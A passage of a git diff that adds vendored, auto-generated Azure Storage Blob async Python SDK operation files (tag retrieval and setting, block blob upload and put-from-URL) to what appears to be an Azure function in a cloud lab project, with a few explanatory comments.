response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + + deserialized = response.stream_download(self._client._pipeline) + + if response.status_code == 206: + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + 
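# --- Editor's note: illustrative comment, not part of the original patch. ---
# This 206 (Partial Content) branch repeats the 200 header handling and
# additionally surfaces x-ms-content-crc64; in both branches the query result
# body itself is streamed via stream_download below.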
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + query.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def get_tags( + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + snapshot: Optional[str] = None, + version_id: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> "_models.BlobTags": + """The Get Tags operation enables users to get the tags associated with a blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "tags". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: BlobTags, or the result of cls(response) + :rtype: ~azure.storage.blob.models.BlobTags + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.BlobTags"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "tags") # type: str + + _if_tags = None + _lease_id = None + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_get_tags_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + snapshot=snapshot, + version_id=version_id, + if_tags=_if_tags, + lease_id=_lease_id, + template_url=self.get_tags.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('BlobTags', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_tags.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_tags( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + version_id: Optional[str] = None, + transactional_content_md5: Optional[bytearray] = None, + transactional_content_crc64: Optional[bytearray] = None, + request_id_parameter: Optional[str] = None, + tags: Optional["_models.BlobTags"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Set Tags operation enables users to set tags on a blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. 
+        :type transactional_content_md5: bytearray
+        :param transactional_content_crc64: Specify the transactional crc64 for the body, to be
+         validated by the service. Default value is None.
+        :type transactional_content_crc64: bytearray
+        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
+         limit that is recorded in the analytics logs when storage analytics logging is enabled. Default
+         value is None.
+        :type request_id_parameter: str
+        :param tags: Blob tags. Default value is None.
+        :type tags: ~azure.storage.blob.models.BlobTags
+        :param modified_access_conditions: Parameter group. Default value is None.
+        :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
+        :param lease_access_conditions: Parameter group. Default value is None.
+        :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
+        :keyword comp: comp. Default value is "tags". Note that overriding this default value may
+         result in unsupported behavior.
+        :paramtype comp: str
+        :keyword callable cls: A custom type or function that will be passed the direct response
+        :return: None, or the result of cls(response)
+        :rtype: None
+        :raises: ~azure.core.exceptions.HttpResponseError
+        """
+        cls = kwargs.pop('cls', None)  # type: ClsType[None]
+        error_map = {
+            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
+        }
+        error_map.update(kwargs.pop('error_map', {}))
+
+        comp = kwargs.pop('comp', "tags")  # type: str
+        content_type = kwargs.pop('content_type', "application/xml")  # type: Optional[str]
+
+        _if_tags = None
+        _lease_id = None
+        if modified_access_conditions is not None:
+            _if_tags = modified_access_conditions.if_tags
+        if lease_access_conditions is not None:
+            _lease_id = lease_access_conditions.lease_id
+        if tags is not None:
+            _content = self._serialize.body(tags, 'BlobTags', is_xml=True)
+        else:
+            _content = None
+
+        request = build_set_tags_request(
+            url=self._config.url,
+            comp=comp,
+            version=self._config.version,
+            content_type=content_type,
+            content=_content,
+            timeout=timeout,
+            version_id=version_id,
+            transactional_content_md5=transactional_content_md5,
+            transactional_content_crc64=transactional_content_crc64,
+            request_id_parameter=request_id_parameter,
+            if_tags=_if_tags,
+            lease_id=_lease_id,
+            template_url=self.set_tags.metadata['url'],
+        )
+        request = _convert_request(request)
+        request.url = self._client.format_url(request.url)
+
+        pipeline_response = await self._client._pipeline.run(  # pylint: disable=protected-access
+            request,
+            stream=False,
+            **kwargs
+        )
+        response = pipeline_response.http_response
+
+        if response.status_code not in [204]:
+            map_error(status_code=response.status_code, response=response, error_map=error_map)
+            error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response)
+            raise HttpResponseError(response=response, model=error)
+
+        response_headers = {}
+        response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
+        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
+        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
+        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
+
+
+        if cls:
+            return cls(pipeline_response, None, response_headers)
+
+    set_tags.metadata = {'url': "{url}/{containerName}/{blob}"}  # type: ignore
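+
+# A minimal tag round-trip sketch (illustrative only, not generated code). In
+# practice the public async wrapper drives the get_tags/set_tags operations
+# above; `conn_str` and the container/blob names here are assumptions.
+#
+#     from azure.storage.blob.aio import BlobClient
+#
+#     blob = BlobClient.from_connection_string(conn_str, "my-container", "my-blob")
+#     await blob.set_blob_tags({"project": "azuregoat"})   # -> BlobOperations.set_tags
+#     tags = await blob.get_blob_tags()                    # -> BlobOperations.get_tags
diff --git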
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_block_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_block_blob_operations.py
new file mode 100644
index 0000000..18f2f2f
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_block_blob_operations.py
@@ -0,0 +1,1064 @@
+# pylint: disable=too-many-lines
+# coding=utf-8
+# --------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for license information.
+# Code generated by Microsoft (R) AutoRest Code Generator.
+# Changes may cause incorrect behavior and will be lost if the code is regenerated.
+# --------------------------------------------------------------------------
+import datetime
+from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union
+
+from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
+from azure.core.pipeline import PipelineResponse
+from azure.core.pipeline.transport import AsyncHttpResponse
+from azure.core.rest import HttpRequest
+from azure.core.tracing.decorator_async import distributed_trace_async
+
+from ... import models as _models
+from ..._vendor import _convert_request
+from ...operations._block_blob_operations import build_commit_block_list_request, build_get_block_list_request, build_put_blob_from_url_request, build_stage_block_from_url_request, build_stage_block_request, build_upload_request
+T = TypeVar('T')
+ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
+
+class BlockBlobOperations:
+    """
+    .. warning::
+        **DO NOT** instantiate this class directly.
+
+    Instead, you should access the following operations through
+    :class:`~azure.storage.blob.aio.AzureBlobStorage`'s
+    :attr:`block_blob` attribute.
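+
+    Illustrative sketch (assumes the public wrapper client and a valid
+    ``conn_str``; not a complete program)::
+
+        from azure.storage.blob.aio import BlobClient
+
+        blob = BlobClient.from_connection_string(conn_str, "container", "blob")
+        # Small payloads go through upload(); larger ones are chunked via
+        # stage_block() and committed with commit_block_list().
+        await blob.upload_blob(data, overwrite=True)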
+ """ + + models = _models + + def __init__(self, *args, **kwargs) -> None: + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace_async + async def upload( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + body: IO, + timeout: Optional[int] = None, + transactional_content_md5: Optional[bytearray] = None, + metadata: Optional[Dict[str, str]] = None, + tier: Optional[Union[str, "_models.AccessTierOptional"]] = None, + request_id_parameter: Optional[str] = None, + blob_tags_string: Optional[str] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + blob_http_headers: Optional["_models.BlobHTTPHeaders"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Upload Block Blob operation updates the content of an existing block blob. Updating an + existing block blob overwrites any existing metadata on the blob. Partial updates are not + supported with Put Blob; the content of the existing blob is overwritten with the content of + the new blob. To perform a partial update of the content of a block blob, use the Put Block + List operation. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. 
+ :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "BlockBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "BlockBlob") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = 
modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = body + + request = build_upload_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_type=content_type, + content=_content, + content_length=content_length, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + tier=tier, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.upload.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + upload.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def put_blob_from_url( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + copy_source: str, + timeout: Optional[int] = None, + transactional_content_md5: Optional[bytearray] = None, + metadata: Optional[Dict[str, str]] = None, + tier: 
Optional[Union[str, "_models.AccessTierOptional"]] = None, + request_id_parameter: Optional[str] = None, + source_content_md5: Optional[bytearray] = None, + blob_tags_string: Optional[str] = None, + copy_source_blob_properties: Optional[bool] = None, + copy_source_authorization: Optional[str] = None, + copy_source_tags: Optional[Union[str, "_models.BlobCopySourceTags"]] = None, + blob_http_headers: Optional["_models.BlobHTTPHeaders"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + source_modified_access_conditions: Optional["_models.SourceModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Put Blob from URL operation creates a new Block Blob where the contents of the blob are + read from a given URL. This API is supported beginning with the 2020-04-08 version. Partial + updates are not supported with Put Blob from URL; the content of an existing blob is + overwritten with the content of the new blob. To perform partial updates to a block blob’s + contents using a source URL, use the Put Block from URL API in conjunction with Put Block List. + + :param content_length: The length of the request. + :type content_length: long + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. 
+ :type blob_tags_string: str + :param copy_source_blob_properties: Optional, default is true. Indicates if properties from + the source blob should be copied. + :type copy_source_blob_properties: bool + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param copy_source_tags: Optional, default 'replace'. Indicates if source tags should be + copied or replaced with the tags specified by x-ms-tags. Default value is None. + :type copy_source_tags: str or ~azure.storage.blob.models.BlobCopySourceTags + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "BlockBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "BlockBlob") # type: str + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + _source_if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = 
cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + _source_if_tags = source_modified_access_conditions.source_if_tags + + request = build_put_blob_from_url_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_length=content_length, + copy_source=copy_source, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + tier=tier, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + source_if_tags=_source_if_tags, + request_id_parameter=request_id_parameter, + source_content_md5=source_content_md5, + blob_tags_string=blob_tags_string, + copy_source_blob_properties=copy_source_blob_properties, + copy_source_authorization=copy_source_authorization, + copy_source_tags=copy_source_tags, + template_url=self.put_blob_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', 
